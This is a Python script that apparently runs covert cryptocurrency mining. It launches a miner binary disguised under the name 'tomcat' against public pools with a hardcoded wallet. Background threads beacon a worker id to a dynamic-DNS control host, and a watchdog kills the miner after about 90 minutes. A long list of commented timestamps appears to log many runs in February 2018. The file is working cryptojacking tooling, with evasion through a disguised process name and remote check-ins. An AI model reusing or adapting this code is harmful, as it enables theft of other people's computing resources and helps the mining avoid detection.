import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:06.810033
#2018-02-17 16:14:03.738760
#2018-02-17 18:01:01.647011
#2018-02-17 19:50:04.321009
#2018-02-17 21:38:04.475292
#2018-02-17 23:22:06.011572
#2018-02-18 01:09:07.217726
#2018-02-18 02:57:05.597582
#2018-02-18 04:47:07.477751
#2018-02-18 06:39:07.597875
#2018-02-18 08:28:05.164941
#2018-02-18 10:15:08.588444
#2018-02-18 12:02:08.054195
#2018-02-18 13:47:01.818452
#2018-02-18 15:39:04.556804
#2018-02-18 17:28:06.921173
#2018-02-18 19:16:05.028511
#2018-02-18 21:02:05.538726
#2018-02-18 22:48:07.515701
#2018-02-19 00:37:06.016767
#2018-02-19 02:23:06.771936
#2018-02-19 04:10:01.499410
#2018-02-19 05:54:03.205895
#2018-02-19 07:43:05.517018
#2018-02-19 09:32:07.618531
#2018-02-19 11:23:01.483609
#2018-02-19 13:09:06.567204
#2018-02-19 14:57:02.144897
#2018-02-19 16:46:08.039356
#2018-02-19 18:33:06.151259
#2018-02-19 20:20:09.248003
#2018-02-19 22:09:02.130375
#2018-02-19 23:56:07.940154
#2018-02-20 01:43:05.592557
#2018-02-20 03:32:02.084115
#2018-02-20 05:19:05.368389
#2018-02-20 07:03:03.588540
#2018-02-20 08:50:03.102228
#2018-02-20 10:34:07.476505
#2018-02-20 12:19:09.872054
#2018-02-20 14:07:07.161278
#2018-02-20 15:52:06.715620
#2018-02-20 17:38:04.434465
#2018-02-20 19:28:09.148299
#2018-02-20 21:17:05.370520
#2018-02-20 23:01:05.833660
#2018-02-21 00:45:10.613401
#2018-02-21 02:30:08.528181
#2018-02-21 04:17:06.732619
#2018-02-21 06:04:07.433129
#2018-02-21 07:52:01.491917
#2018-02-21 09:37:01.713529
#2018-02-21 11:27:02.284569
#2018-02-21 13:16:06.475604
#2018-02-21 15:01:09.841222
#2018-02-21 16:49:05.155301
#2018-02-21 18:38:06.931702
#2018-02-21 20:23:05.478370
#2018-02-21 22:12:03.713941
#2018-02-22 00:01:04.405713
#2018-02-22 01:49:04.665554
#2018-02-22 03:36:05.468250
#2018-02-22 05:23:04.698488
#2018-02-22 07:07:07.224362
#2018-02-22 08:53:05.307545
#2018-02-22 10:40:09.160221
#2018-02-22 12:28:01.532104
#2018-02-22 14:12:08.443037
#2018-02-22 15:59:07.454005
#2018-02-22 17:46:02.170313
#2018-02-22 19:33:02.092019
#2018-02-22 21:24:06.648529
#2018-02-22 23:09:04.207167
#2018-02-23 00:55:07.575696
#2018-02-23 02:42:07.289247
#2018-02-23 04:30:06.604584
#2018-02-23 06:15:07.902064
#2018-02-23 08:03:04.071256
#2018-02-23 10:18:08.803293
#2018-02-23 12:12:06.987608
#2018-02-23 14:00:13.110113
#2018-02-23 15:52:06.314537
#2018-02-23 17:39:01.743946
#2018-02-23 19:25:03.902327
#2018-02-23 21:08:03.967548
#2018-02-23 22:55:05.555882
#2018-02-24 00:43:07.039571
#2018-02-24 02:36:08.411739
#2018-02-24 04:31:01.873036
#2018-02-24 06:15:07.416460
#2018-02-24 08:03:07.069862
#2018-02-24 09:47:04.193723
#2018-02-24 11:42:01.678845
#2018-02-24 13:33:06.897869
#2018-02-24 15:21:07.116309
#2018-02-24 17:10:09.294641
#2018-02-24 19:02:08.057935
#2018-02-24 20:51:01.864647
#2018-02-24 23:09:05.194607
#2018-02-25 02:24:05.356348
#2018-02-25 05:37:06.036296
#2018-02-25 11:35:06.146186